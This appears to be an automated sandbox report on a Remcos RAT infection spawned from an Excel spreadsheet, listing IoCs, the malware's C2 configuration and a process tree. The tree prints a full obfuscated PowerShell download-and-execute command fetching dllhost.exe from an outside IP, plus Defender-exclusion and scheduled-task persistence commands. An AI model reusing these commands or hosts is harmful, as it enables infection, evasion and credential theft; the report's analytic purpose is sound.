remcos | 2fc21f78d38708b2fd7d776780305ae303ec4277e41241462d4cf3f94a779d29

Analysis

max time kernel
147s
max time network
148s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
01-10-2024 11:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

TT12822024.xls
Size

640KB
MD5

3e23db29ce7cdc215bac52c531aed525
SHA1

57286b0272df8386254ba0fbe340f0fba2cafbc8
SHA256

2fc21f78d38708b2fd7d776780305ae303ec4277e41241462d4cf3f94a779d29
SHA512

0dfe34dcf345a6d501ad6d20758b212f7c13af5181330fcdbad3598a748b155c811438bde78220efd26aa73ffe6273c639fea7d04ed2b7d32f1a58da43195843
SSDEEP

12288:ECf1SLuA5XvOZWQNb7/Aiy/vyEzrFdIiC1smRaAVpwnzI613rQdq:zMxxvXQ5/ny/v9r4PKqczI6NMd

Score

10^/10

remcos remotehost collection defense_evasion discovery execution rat spyware stealer

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

hiddenrmcnew.duckdns.org:7839

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-PW8G0U
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral1/memory/584-125-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/3068-120-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/3060-119-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral1/memory/3060-119-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral1/memory/3068-120-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 3 IoCs

flow	pid	Process
10	2976	mshta.exe
11	2976	mshta.exe
13	2904	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2332	powershell.exe
2440	powershell.exe

Downloads MZ/PE file

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
2904	powershell.exe

Executes dropped EXE 6 IoCs

pid	Process
1148	dllhost.exe
1000	dllhost.exe
2544	dllhost.exe
3068	dllhost.exe
3060	dllhost.exe
584	dllhost.exe

Loads dropped DLL 1 IoCs

pid	Process
2904	powershell.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	dllhost.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 1148 set thread context of 2544	1148	dllhost.exe	47
PID 2544 set thread context of 3068	2544	dllhost.exe	48
PID 2544 set thread context of 3060	2544	dllhost.exe	49
PID 2544 set thread context of 584	2544	dllhost.exe	50

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dllhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dllhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dllhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dllhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dllhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2940	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1252	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
2904	powershell.exe
2904	powershell.exe
2904	powershell.exe
1148	dllhost.exe
2440	powershell.exe
2332	powershell.exe
1148	dllhost.exe
1148	dllhost.exe
1148	dllhost.exe
3068	dllhost.exe
3068	dllhost.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
2544	dllhost.exe
2544	dllhost.exe
2544	dllhost.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2904	powershell.exe
Token: SeDebugPrivilege	1148	dllhost.exe
Token: SeDebugPrivilege	2440	powershell.exe
Token: SeDebugPrivilege	2332	powershell.exe
Token: SeDebugPrivilege	584	dllhost.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
1252	EXCEL.EXE
1252	EXCEL.EXE
1252	EXCEL.EXE
1252	EXCEL.EXE
1252	EXCEL.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2976 wrote to memory of 2588	2976	mshta.exe	32
PID 2976 wrote to memory of 2588	2976	mshta.exe	32
PID 2976 wrote to memory of 2588	2976	mshta.exe	32
PID 2976 wrote to memory of 2588	2976	mshta.exe	32
PID 2588 wrote to memory of 2904	2588	cmd.exe	34
PID 2588 wrote to memory of 2904	2588	cmd.exe	34
PID 2588 wrote to memory of 2904	2588	cmd.exe	34
PID 2588 wrote to memory of 2904	2588	cmd.exe	34
PID 2904 wrote to memory of 776	2904	powershell.exe	35
PID 2904 wrote to memory of 776	2904	powershell.exe	35
PID 2904 wrote to memory of 776	2904	powershell.exe	35
PID 2904 wrote to memory of 776	2904	powershell.exe	35
PID 776 wrote to memory of 1920	776	csc.exe	36
PID 776 wrote to memory of 1920	776	csc.exe	36
PID 776 wrote to memory of 1920	776	csc.exe	36
PID 776 wrote to memory of 1920	776	csc.exe	36
PID 2904 wrote to memory of 1148	2904	powershell.exe	39
PID 2904 wrote to memory of 1148	2904	powershell.exe	39
PID 2904 wrote to memory of 1148	2904	powershell.exe	39
PID 2904 wrote to memory of 1148	2904	powershell.exe	39
PID 1148 wrote to memory of 2440	1148	dllhost.exe	40
PID 1148 wrote to memory of 2440	1148	dllhost.exe	40
PID 1148 wrote to memory of 2440	1148	dllhost.exe	40
PID 1148 wrote to memory of 2440	1148	dllhost.exe	40
PID 1148 wrote to memory of 2332	1148	dllhost.exe	42
PID 1148 wrote to memory of 2332	1148	dllhost.exe	42
PID 1148 wrote to memory of 2332	1148	dllhost.exe	42
PID 1148 wrote to memory of 2332	1148	dllhost.exe	42
PID 1148 wrote to memory of 2940	1148	dllhost.exe	43
PID 1148 wrote to memory of 2940	1148	dllhost.exe	43
PID 1148 wrote to memory of 2940	1148	dllhost.exe	43
PID 1148 wrote to memory of 2940	1148	dllhost.exe	43
PID 1148 wrote to memory of 1000	1148	dllhost.exe	46
PID 1148 wrote to memory of 1000	1148	dllhost.exe	46
PID 1148 wrote to memory of 1000	1148	dllhost.exe	46
PID 1148 wrote to memory of 1000	1148	dllhost.exe	46
PID 1148 wrote to memory of 2544	1148	dllhost.exe	47
PID 1148 wrote to memory of 2544	1148	dllhost.exe	47
PID 1148 wrote to memory of 2544	1148	dllhost.exe	47
PID 1148 wrote to memory of 2544	1148	dllhost.exe	47
PID 1148 wrote to memory of 2544	1148	dllhost.exe	47
PID 1148 wrote to memory of 2544	1148	dllhost.exe	47
PID 1148 wrote to memory of 2544	1148	dllhost.exe	47
PID 1148 wrote to memory of 2544	1148	dllhost.exe	47
PID 1148 wrote to memory of 2544	1148	dllhost.exe	47
PID 1148 wrote to memory of 2544	1148	dllhost.exe	47
PID 1148 wrote to memory of 2544	1148	dllhost.exe	47
PID 1148 wrote to memory of 2544	1148	dllhost.exe	47
PID 1148 wrote to memory of 2544	1148	dllhost.exe	47
PID 2544 wrote to memory of 3068	2544	dllhost.exe	48
PID 2544 wrote to memory of 3068	2544	dllhost.exe	48
PID 2544 wrote to memory of 3068	2544	dllhost.exe	48
PID 2544 wrote to memory of 3068	2544	dllhost.exe	48
PID 2544 wrote to memory of 3068	2544	dllhost.exe	48
PID 2544 wrote to memory of 3060	2544	dllhost.exe	49
PID 2544 wrote to memory of 3060	2544	dllhost.exe	49
PID 2544 wrote to memory of 3060	2544	dllhost.exe	49
PID 2544 wrote to memory of 3060	2544	dllhost.exe	49
PID 2544 wrote to memory of 3060	2544	dllhost.exe	49
PID 2544 wrote to memory of 584	2544	dllhost.exe	50
PID 2544 wrote to memory of 584	2544	dllhost.exe	50
PID 2544 wrote to memory of 584	2544	dllhost.exe	50
PID 2544 wrote to memory of 584	2544	dllhost.exe	50
PID 2544 wrote to memory of 584	2544	dllhost.exe	50

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\TT12822024.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1252

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2976
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C POwErShell -EX bYpasS -Nop -w 1 -C DEvIcECreDeNtialDEPlOYmEnt.exE ; ieX($(Iex('[SYStEm.TeXt.enCOdINg]'+[CHAr]0X3A+[chAR]0x3A+'utF8.GetSTriNG([sYstEm.coNveRt]'+[chAR]0X3A+[ChAR]0x3a+'froMBase64StrinG('+[CHAr]34+'JHNzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbWJFUmRlRmlOSVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFaUXksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb2pVd2NUYkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGtMLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFeWYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnBwZU9uKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHROTGNwZUVvQWNrICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRzczo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEzNC4xOS4xNzcuNDQvOTAvZGxsaG9zdC5leGUiLCIkZU5WOkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RBUnQtU0xFZVAoMyk7U1RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[chAR]34+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2588
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    POwErShell -EX bYpasS -Nop -w 1 -C DEvIcECreDeNtialDEPlOYmEnt.exE ; ieX($(Iex('[SYStEm.TeXt.enCOdINg]'+[CHAr]0X3A+[chAR]0x3A+'utF8.GetSTriNG([sYstEm.coNveRt]'+[chAR]0X3A+[ChAR]0x3a+'froMBase64StrinG('+[CHAr]34+'JHNzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbWJFUmRlRmlOSVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFaUXksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb2pVd2NUYkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGtMLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFeWYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnBwZU9uKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHROTGNwZUVvQWNrICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRzczo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEzNC4xOS4xNzcuNDQvOTAvZGxsaG9zdC5leGUiLCIkZU5WOkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RBUnQtU0xFZVAoMyk7U1RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[chAR]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - Loads dropped DLL
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2904
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gkrt0pwf.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:776
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC092.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC091.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1920
  - - C:\Users\Admin\AppData\Roaming\dllhost.exe
      "C:\Users\Admin\AppData\Roaming\dllhost.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1148
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\dllhost.exe"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2440
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\ZukuCcvWAQW.exe"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2332
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZukuCcvWAQW" /XML "C:\Users\Admin\AppData\Local\Temp\tmp628.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2940
    - - C:\Users\Admin\AppData\Roaming\dllhost.exe
        
        "C:\Users\Admin\AppData\Roaming\dllhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:1000
    - - C:\Users\Admin\AppData\Roaming\dllhost.exe
        
        "C:\Users\Admin\AppData\Roaming\dllhost.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:2544
      - C:\Users\Admin\AppData\Roaming\dllhost.exe
        
        C:\Users\Admin\AppData\Roaming\dllhost.exe /stext "C:\Users\Admin\AppData\Local\Temp\afxasbdpfhey"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3068
      - C:\Users\Admin\AppData\Roaming\dllhost.exe
        
        C:\Users\Admin\AppData\Roaming\dllhost.exe /stext "C:\Users\Admin\AppData\Local\Temp\lacttunjspwddbd"
        6⤵
        Executes dropped EXE
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:3060
      - C:\Users\Admin\AppData\Roaming\dllhost.exe
        
        C:\Users\Admin\AppData\Roaming\dllhost.exe /stext "C:\Users\Admin\AppData\Local\Temp\ncidumykoxoifhzeai"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:584

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
7fb5fa1534dcf77f2125b2403b30a0ee

SHA1
365d96812a69ac0a4611ea4b70a3f306576cc3ea

SHA256
33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

SHA512
a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
844b5fe01fa2680869b56983c5d6bd38

SHA1
96a30514da736cba26c7f16fcbecedf5fcd7e0c3

SHA256
b58012154916da29cb737ed971a7280f285055517df2f031f883b1a0a69210f8

SHA512
e60ce34b927700a2940ba47d8f07d09879120817057ff1101def8a88fcf8246a2fe68c08beb6e95e668da993c523f4b6926a461a5c59e7a1660cf4c749da519c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
5a36776d9b5d7f17ec2b82c9e9541a0f

SHA1
61121d162781c83a9b5eb37c06fee733e7514cfc

SHA256
60435e33ac8cbc1ad16df44025b582cc8fe81e38d2f51d2996602b80af383e64

SHA512
928f0a09a8a9c112f53193e2b60d06664460914e0a7420764c121068bc618130cbe8b3ea8db4eb82c769f094c1e49578997935e9cf26b298d66c1714312895b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y8UFEBH5\IEnetsatwithnewthingstobeonline[1].hta

Filesize
8KB

MD5
d9ac57b5892373b3bedbfa2b40c7c0d2

SHA1
51293feca6b9ac5eeae0d2787ddcbb63ce42562e

SHA256
6c9ea8439a54ca2306b9e8c32b153db150b16c4cdb3e83a5fafb0b92c1c26318

SHA512
dda99fed1c86c9f232ddd9778e5107ec4d45885afd5ee528a3fb62c08898b40dab66c631fe46bce96a6f205ab9b12b0029c81ca510bc0cf4411cdcbb90a5e034

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabB8C4.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC092.tmp

Filesize
1KB

MD5
d6733371ed3dc46215243c19a6a50011

SHA1
4efdfeb8af7ba34de6fd0eb1557807c2bfe8b5b2

SHA256
9fe0925b6546bdaaea097584a997049118edd457cfd7aaafc56697786697fc71

SHA512
8e2a23a37b80f56c478f9882600364efee4b9a8f57df89a8aed3b8b01d9b469377d50905409fc9215e41199d87356296101673b5803fa590dcd954491744f7fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\afxasbdpfhey

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Local\Temp\gkrt0pwf.dll

Filesize
3KB

MD5
f0b7f5d58acc7355ac4b1268fc86599c

SHA1
7c43005348f309c43282ddaaaf3ea7dfad1d0d32

SHA256
642f75c34b364e51b6b2d6be3d3027205159d14dc4f3881069cb32dffdb55002

SHA512
4b30b505cb5e6a2fd3ea1290f497cdf54cc0097f55a2719ba2ba50b3a01c6b3619c0ffd72d92493ee552ac65ace5c91b1e0dd96c3d040e8e9726bf1d398e85f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\gkrt0pwf.pdb

Filesize
7KB

MD5
acfbd830eec3aea4d26c0f5b4fcfdc6d

SHA1
2128a429e7a1eea1fb7c8f3e244bbe0e0d2dd6e1

SHA256
90851b3b92f1ab9a31d249958ff20133c6dcc84350c4fc09d5430d4f1e99e1dd

SHA512
17b90ca6f1ca535862ee28c1c908a2f7f7015840018f3dbff0aa6cf0ec8cfdd05741c59e706dbcc1fbd107bd3754e7c802ac717283fc8683c4d134e939349821

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp628.tmp

Filesize
1KB

MD5
d5f230fb38d3b1f813a1121ae7a2e2ce

SHA1
58ca50fbc1e4bd2df2319eac21b1d3bc65c896b3

SHA256
715c593bf12a2bda81f182e6071148af17d5cef0c5e358eea00b72e2ed2b6bed

SHA512
ef89e5dc81cb4714133e9220a61c01c2989834f83078d750209cad7425f0584cc2a1adfd1c823640bed38f78a629e588162bdf9916eb0560429e170ba5cfd78a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RBJYFQXKKVPS0EHN9WI0.temp

Filesize
7KB

MD5
1117a5a88d9076e25db179819d2b8dad

SHA1
973b234835accd96984e795db23f85fd6079afb2

SHA256
8e68bc5ba2c1f32073ab916e658be74ff5a9f442397fa4a9957c5ad7fcd7c860

SHA512
fd200e8aa1e76392e8153f0946902a4206291453d84caec4222d1eb81913bf0f99695d88b4fceed0616b9ea6f966a5502a514f94e960fe73f792be84bf8b26d6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
80ddf313d9b77b18f1bb1e14cf316025

SHA1
cf17a779a760774db297c20d2c83f49912dfef3c

SHA256
bf0a30207f3a0aa159a97d459f6c151f7a5f94f49ea165f6a345be818471f5c3

SHA512
e8acf84f761704fc28c311879c6a8e5091a75c8eaaa42a9f5a9adce3b2f6c0e7e53027ab075b61b4a38f36e0e2cba25dc1085e9b798f2e3d020da85e9bbff1d1

Download Submit
C:\Users\Admin\AppData\Roaming\dllhost.exe

Filesize
1.0MB

MD5
06288ac34c34b1751dca19951d6140f8

SHA1
e3af412db4368c7a3c7b3a0a812c2af6903bb697

SHA256
156b1cea1a2f649e332be482047de3d368f5f7b7e93eb4821692ada17a69fc75

SHA512
47cd551807523783db43570df4d3ab4edb52699b8a118b91453c12aa5c5ca3b746a023ce6b5b0561754f876671136312b9aa725d6a8c5fec0ef004231caaf039

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCC091.tmp

Filesize
652B

MD5
0ee2a32ba6d9ac7578093caa434bc40f

SHA1
7912f014965db540713352049154ed9a73cb6f8d

SHA256
b0de99676a34542c7a9ae33659447cb301ff1c4c1f24cbdfcbcf0769c5e8f7a8

SHA512
bd8ae7058a100dedfee77573a116fa906e782cf0e4c0c29df538f006af378874352520e9ff7b89442207956151e816765af56d69d616483d81cc3f5cae318694

Download Submit
